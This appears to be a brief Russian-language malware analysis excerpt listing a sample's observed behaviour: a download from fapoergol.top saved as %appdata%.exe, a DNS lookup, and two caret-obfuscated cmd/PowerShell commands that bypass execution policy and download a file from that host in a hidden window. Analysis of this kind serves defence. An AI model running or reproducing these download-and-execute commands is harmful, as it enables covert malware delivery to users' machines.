Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pow^E^rsHe^L^l.e^x^e^ -e^XecUT^I^ON^pOlic^Y ^BYpaSs^ -NoPRoF^IL^E -w^inDOw^STy^Le ^H^IDDE^n (nEw^-Obj^EcT ^SY^S^Te^M.^NET.^wEbc^LIE^nT).^DowN^L^oadfiLE('http://www.fapoergol.to...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "pow^E^rsHe^L^l.e^x^e^ -e^XecUT^I^ON^pOlic^Y ^BYpaSs^ -NoPRoF^IL^E -w^inDOw^STy^Le ^H^IDDE^n (nEw^-Obj^EcT ^SY^S^Te^M.^NET.^wEbc^LIE^nT).^DowN^L^oadfiLE('http://www.fapoergol.to...' (со скрытым окном)